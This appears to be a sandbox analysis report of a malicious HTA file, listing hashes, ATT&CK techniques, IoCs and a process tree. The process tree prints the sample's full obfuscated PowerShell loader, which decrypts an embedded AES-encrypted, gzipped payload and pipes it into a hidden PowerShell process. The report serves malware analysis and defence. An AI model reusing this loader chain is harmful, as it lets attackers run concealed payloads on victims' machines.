d4f6598a76b92b919bccac6394429a94e7e28da1a86d53e3cd5b204e9c9dc8a8

General

Target

d4f6598a76b92b919bccac6394429a94e7e28da1a86d53e3cd5b204e9c9dc8a8_JC.hta
Size

1.3MB
MD5

63cdb37e2bf2928a36eafe3705d30284
SHA1

235f23fafaa45b5b41fc95e567f098e179c43e0c
SHA256

d4f6598a76b92b919bccac6394429a94e7e28da1a86d53e3cd5b204e9c9dc8a8
SHA512

720eea1eaf5da2d3c617dfae82a2f97735c24b0e9cd0ce9549679bdfa9989293b44986393f17c666d15c1dba34b3340bdb94550891454a029d67229fa908fd52
SSDEEP

3072:TO1dnIpk90I3oQ504RqikgNkZdPR5YvP0fwlakvzIo9:TO1dnI+28j0zcOjE0fwlhvzZ9

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2580	powershell.exe
2580	powershell.exe
2580	powershell.exe
3016	powershell.exe
2624	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2976 wrote to memory of 2580	2976	mshta.exe	28
PID 2976 wrote to memory of 2580	2976	mshta.exe	28
PID 2976 wrote to memory of 2580	2976	mshta.exe	28
PID 2976 wrote to memory of 2580	2976	mshta.exe	28
PID 2580 wrote to memory of 2520	2580	powershell.exe	30
PID 2580 wrote to memory of 2520	2580	powershell.exe	30
PID 2580 wrote to memory of 2520	2580	powershell.exe	30
PID 2580 wrote to memory of 2520	2580	powershell.exe	30
PID 2520 wrote to memory of 3016	2520	cmd.exe	32
PID 2520 wrote to memory of 3016	2520	cmd.exe	32
PID 2520 wrote to memory of 3016	2520	cmd.exe	32
PID 2520 wrote to memory of 3016	2520	cmd.exe	32
PID 2520 wrote to memory of 2624	2520	cmd.exe	33
PID 2520 wrote to memory of 2624	2520	cmd.exe	33
PID 2520 wrote to memory of 2624	2520	cmd.exe	33
PID 2520 wrote to memory of 2624	2520	cmd.exe	33

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d4f6598a76b92b919bccac6394429a94e7e28da1a86d53e3cd5b204e9c9dc8a8_JC.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $IfcJFw = 'AAAAAAAAAAAAAAAAAAAAAHb3ymCRBGKArGUm7RLWuQZxOL9/MRKecaj/zuPelyT0yzAZspLHQIwW82PcBywAAsgEjX66JU6O2rbtlUo/3KA9cUtIgHS3onZ2siOKu4UNRg5GMh3RV+GoAzrdyleWboQtg9W+OjMauxDpVEGbqJ5YWJ0ofQ2R3utTSwBOcuNrCeFwlQn7Y067HeXzzqIJk+Gtw9NPeljzlbc9JWkIE0KMsewRcwJGZ2dXxJmRHbju2CkCSA8qvHz9Xodryx/tjUut4wgWcPsBBzIqBIdwl4EIMkl2QADR9IlloBjagdGLAg1PFqFVae2GivBYZ5hGrEJjWtxdEEzqRJSWM/j745kzD5Afvr+UCEpHL2mCke1h8gAs7E7uZLbFX3fkzH+dv+5RALWRzNHhaWXafbZWuzouZUvzDg7a2XT/B/mhVfoDKzx7xfOUpCFgW7XxBU5NuiCGYbW898PQFjGNaq7YccfZV1Gtv77S4H438adF/ILSaFEy9j+6SIvs87ELGk3Bmds4gcekp5Sg1TgyHlivIaAYJ8Oc02TuNjr5STXvOOJFBXTzexboF7sNqZXgXHZ5SYmim7yEs94GTgjsX4L2JAxyjPw/bIchbdaeHP9XTZkXlIe2Hofv+gnN0dkU3QuuhCOPJjVzTUFD4YyRaJWdH23uzPAJtKSLxhlXnkixH39yZMzij9DoS0DVLR48686GCNf0T2TwwnIzmqNVHcrWaIJp0lrKqSbkkyNgB6NPZwlwThC6Pc8IKUFVWqAYAXsMJPD0/q4haH+KKxR7aeuTU9Xtlideh+Kd+cvD4xwBsxxBstI6ckeGKZn73KIVfNgA8ELqPTRTCTzLTgMnnQ0U76J60rkGpmSl/IA+Vb/0oezep1/q7/1EAuk1ba4rUWlJ81eFnYwruRNEkRG1YaICrI2kELk2dWgN1409WbYHOkC0V3j3yK8RB5D8KjhtRPFJTJOBiDNm1gLhkvshnhnVgaXk967vQOrapW/zaj4jlApylzIktsk8wPQOAoPkhXWab12STPiiOF6C83P+NbqgaThVcL/OJVHUZhpWsLhz4203W/KAJhOenVIy2aoEFhv7cMssRjZuVsr72/9Skfy0wfIV5TVRP1dAcc5S4VjgUSI+';$wXyAny = 'S3hwZ1lQTlZ3aWdOZldDamJ0aWNZZENLSGxCWm9LRXo=';$kLPlhbc = New-Object 'System.Security.Cryptography.AesManaged';$kLPlhbc.Mode = [System.Security.Cryptography.CipherMode]::ECB;$kLPlhbc.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$kLPlhbc.BlockSize = 128;$kLPlhbc.KeySize = 256;$kLPlhbc.Key = [System.Convert]::FromBase64String($wXyAny);$MBwBH = [System.Convert]::FromBase64String($IfcJFw);$NQtsrvxc = $MBwBH[0..15];$kLPlhbc.IV = $NQtsrvxc;$iRbgqMsUJ = $kLPlhbc.CreateDecryptor();$srHcHSZFe = $iRbgqMsUJ.TransformFinalBlock($MBwBH, 16, $MBwBH.Length - 16);$kLPlhbc.Dispose();$qOmk = New-Object System.IO.MemoryStream( , $srHcHSZFe );$OHUOFWU = New-Object System.IO.MemoryStream;$WlrLkfaTn = New-Object System.IO.Compression.GzipStream $qOmk, ([IO.Compression.CompressionMode]::Decompress);$WlrLkfaTn.CopyTo( $OHUOFWU );$WlrLkfaTn.Close();$qOmk.Close();[byte[]] $xmrrF = $OHUOFWU.ToArray();$tqTAG = [System.Text.Encoding]::UTF8.GetString($xmrrF);$tqTAG | powershell - }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c powershell.exe $IfcJFw = 'AAAAAAAAAAAAAAAAAAAAAHb3ymCRBGKArGUm7RLWuQZxOL9/MRKecaj/zuPelyT0yzAZspLHQIwW82PcBywAAsgEjX66JU6O2rbtlUo/3KA9cUtIgHS3onZ2siOKu4UNRg5GMh3RV+GoAzrdyleWboQtg9W+OjMauxDpVEGbqJ5YWJ0ofQ2R3utTSwBOcuNrCeFwlQn7Y067HeXzzqIJk+Gtw9NPeljzlbc9JWkIE0KMsewRcwJGZ2dXxJmRHbju2CkCSA8qvHz9Xodryx/tjUut4wgWcPsBBzIqBIdwl4EIMkl2QADR9IlloBjagdGLAg1PFqFVae2GivBYZ5hGrEJjWtxdEEzqRJSWM/j745kzD5Afvr+UCEpHL2mCke1h8gAs7E7uZLbFX3fkzH+dv+5RALWRzNHhaWXafbZWuzouZUvzDg7a2XT/B/mhVfoDKzx7xfOUpCFgW7XxBU5NuiCGYbW898PQFjGNaq7YccfZV1Gtv77S4H438adF/ILSaFEy9j+6SIvs87ELGk3Bmds4gcekp5Sg1TgyHlivIaAYJ8Oc02TuNjr5STXvOOJFBXTzexboF7sNqZXgXHZ5SYmim7yEs94GTgjsX4L2JAxyjPw/bIchbdaeHP9XTZkXlIe2Hofv+gnN0dkU3QuuhCOPJjVzTUFD4YyRaJWdH23uzPAJtKSLxhlXnkixH39yZMzij9DoS0DVLR48686GCNf0T2TwwnIzmqNVHcrWaIJp0lrKqSbkkyNgB6NPZwlwThC6Pc8IKUFVWqAYAXsMJPD0/q4haH+KKxR7aeuTU9Xtlideh+Kd+cvD4xwBsxxBstI6ckeGKZn73KIVfNgA8ELqPTRTCTzLTgMnnQ0U76J60rkGpmSl/IA+Vb/0oezep1/q7/1EAuk1ba4rUWlJ81eFnYwruRNEkRG1YaICrI2kELk2dWgN1409WbYHOkC0V3j3yK8RB5D8KjhtRPFJTJOBiDNm1gLhkvshnhnVgaXk967vQOrapW/zaj4jlApylzIktsk8wPQOAoPkhXWab12STPiiOF6C83P+NbqgaThVcL/OJVHUZhpWsLhz4203W/KAJhOenVIy2aoEFhv7cMssRjZuVsr72/9Skfy0wfIV5TVRP1dAcc5S4VjgUSI+';$wXyAny = 'S3hwZ1lQTlZ3aWdOZldDamJ0aWNZZENLSGxCWm9LRXo=';$kLPlhbc = New-Object 'System.Security.Cryptography.AesManaged';$kLPlhbc.Mode = [System.Security.Cryptography.CipherMode]::ECB;$kLPlhbc.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$kLPlhbc.BlockSize = 128;$kLPlhbc.KeySize = 256;$kLPlhbc.Key = [System.Convert]::FromBase64String($wXyAny);$MBwBH = [System.Convert]::FromBase64String($IfcJFw);$NQtsrvxc = $MBwBH[0..15];$kLPlhbc.IV = $NQtsrvxc;$iRbgqMsUJ = $kLPlhbc.CreateDecryptor();$srHcHSZFe = $iRbgqMsUJ.TransformFinalBlock($MBwBH, 16, $MBwBH.Length - 16);$kLPlhbc.Dispose();$qOmk = New-Object System.IO.MemoryStream( , $srHcHSZFe );$OHUOFWU = New-Object System.IO.MemoryStream;$WlrLkfaTn = New-Object System.IO.Compression.GzipStream $qOmk, ([IO.Compression.CompressionMode]::Decompress);$WlrLkfaTn.CopyTo( $OHUOFWU );$WlrLkfaTn.Close();$qOmk.Close();[byte[]] $xmrrF = $OHUOFWU.ToArray();$tqTAG = [System.Text.Encoding]::UTF8.GetString($xmrrF);$tqTAG | powershell -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2520
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe $IfcJFw = 'AAAAAAAAAAAAAAAAAAAAAHb3ymCRBGKArGUm7RLWuQZxOL9/MRKecaj/zuPelyT0yzAZspLHQIwW82PcBywAAsgEjX66JU6O2rbtlUo/3KA9cUtIgHS3onZ2siOKu4UNRg5GMh3RV+GoAzrdyleWboQtg9W+OjMauxDpVEGbqJ5YWJ0ofQ2R3utTSwBOcuNrCeFwlQn7Y067HeXzzqIJk+Gtw9NPeljzlbc9JWkIE0KMsewRcwJGZ2dXxJmRHbju2CkCSA8qvHz9Xodryx/tjUut4wgWcPsBBzIqBIdwl4EIMkl2QADR9IlloBjagdGLAg1PFqFVae2GivBYZ5hGrEJjWtxdEEzqRJSWM/j745kzD5Afvr+UCEpHL2mCke1h8gAs7E7uZLbFX3fkzH+dv+5RALWRzNHhaWXafbZWuzouZUvzDg7a2XT/B/mhVfoDKzx7xfOUpCFgW7XxBU5NuiCGYbW898PQFjGNaq7YccfZV1Gtv77S4H438adF/ILSaFEy9j+6SIvs87ELGk3Bmds4gcekp5Sg1TgyHlivIaAYJ8Oc02TuNjr5STXvOOJFBXTzexboF7sNqZXgXHZ5SYmim7yEs94GTgjsX4L2JAxyjPw/bIchbdaeHP9XTZkXlIe2Hofv+gnN0dkU3QuuhCOPJjVzTUFD4YyRaJWdH23uzPAJtKSLxhlXnkixH39yZMzij9DoS0DVLR48686GCNf0T2TwwnIzmqNVHcrWaIJp0lrKqSbkkyNgB6NPZwlwThC6Pc8IKUFVWqAYAXsMJPD0/q4haH+KKxR7aeuTU9Xtlideh+Kd+cvD4xwBsxxBstI6ckeGKZn73KIVfNgA8ELqPTRTCTzLTgMnnQ0U76J60rkGpmSl/IA+Vb/0oezep1/q7/1EAuk1ba4rUWlJ81eFnYwruRNEkRG1YaICrI2kELk2dWgN1409WbYHOkC0V3j3yK8RB5D8KjhtRPFJTJOBiDNm1gLhkvshnhnVgaXk967vQOrapW/zaj4jlApylzIktsk8wPQOAoPkhXWab12STPiiOF6C83P+NbqgaThVcL/OJVHUZhpWsLhz4203W/KAJhOenVIy2aoEFhv7cMssRjZuVsr72/9Skfy0wfIV5TVRP1dAcc5S4VjgUSI+';$wXyAny = 'S3hwZ1lQTlZ3aWdOZldDamJ0aWNZZENLSGxCWm9LRXo=';$kLPlhbc = New-Object 'System.Security.Cryptography.AesManaged';$kLPlhbc.Mode = [System.Security.Cryptography.CipherMode]::ECB;$kLPlhbc.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$kLPlhbc.BlockSize = 128;$kLPlhbc.KeySize = 256;$kLPlhbc.Key = [System.Convert]::FromBase64String($wXyAny);$MBwBH = [System.Convert]::FromBase64String($IfcJFw);$NQtsrvxc = $MBwBH[0..15];$kLPlhbc.IV = $NQtsrvxc;$iRbgqMsUJ = $kLPlhbc.CreateDecryptor();$srHcHSZFe = $iRbgqMsUJ.TransformFinalBlock($MBwBH, 16, $MBwBH.Length - 16);$kLPlhbc.Dispose();$qOmk = New-Object System.IO.MemoryStream( , $srHcHSZFe );$OHUOFWU = New-Object System.IO.MemoryStream;$WlrLkfaTn = New-Object System.IO.Compression.GzipStream $qOmk, ([IO.Compression.CompressionMode]::Decompress);$WlrLkfaTn.CopyTo( $OHUOFWU );$WlrLkfaTn.Close();$qOmk.Close();[byte[]] $xmrrF = $OHUOFWU.ToArray();$tqTAG = [System.Text.Encoding]::UTF8.GetString($xmrrF);$tqTAG
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3016
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9SQDQSNS6IKLKOOTNXHZ.temp

Filesize
7KB

MD5
2bbb4e1f46e816d51d40aa1a5afd7e2c

SHA1
5a9434b5aba096b70cde3274c4652934394485ed

SHA256
59f9fc2a5b5b202881f5f7504d6b10dbb2d7a122d16102e7865cd027a45a8534

SHA512
56c68262d5e609cdc42118f026c17235bbdac04539ed7456ee20a2685cd5f8948b2f378900d29ef6036c40a46e73cde65ee6a8974afa2f5c124bb46c3fd45d09

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
2bbb4e1f46e816d51d40aa1a5afd7e2c

SHA1
5a9434b5aba096b70cde3274c4652934394485ed

SHA256
59f9fc2a5b5b202881f5f7504d6b10dbb2d7a122d16102e7865cd027a45a8534

SHA512
56c68262d5e609cdc42118f026c17235bbdac04539ed7456ee20a2685cd5f8948b2f378900d29ef6036c40a46e73cde65ee6a8974afa2f5c124bb46c3fd45d09

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
2bbb4e1f46e816d51d40aa1a5afd7e2c

SHA1
5a9434b5aba096b70cde3274c4652934394485ed

SHA256
59f9fc2a5b5b202881f5f7504d6b10dbb2d7a122d16102e7865cd027a45a8534

SHA512
56c68262d5e609cdc42118f026c17235bbdac04539ed7456ee20a2685cd5f8948b2f378900d29ef6036c40a46e73cde65ee6a8974afa2f5c124bb46c3fd45d09

Download Submit
memory/2580-14-0x0000000002240000-0x0000000002280000-memory.dmp

Filesize
256KB

Download
memory/2580-15-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-11-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-13-0x0000000002240000-0x0000000002280000-memory.dmp

Filesize
256KB

Download
memory/2580-12-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/2624-28-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/2624-29-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/2624-31-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/3016-26-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/3016-27-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download
memory/3016-30-0x0000000074380000-0x000000007492B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing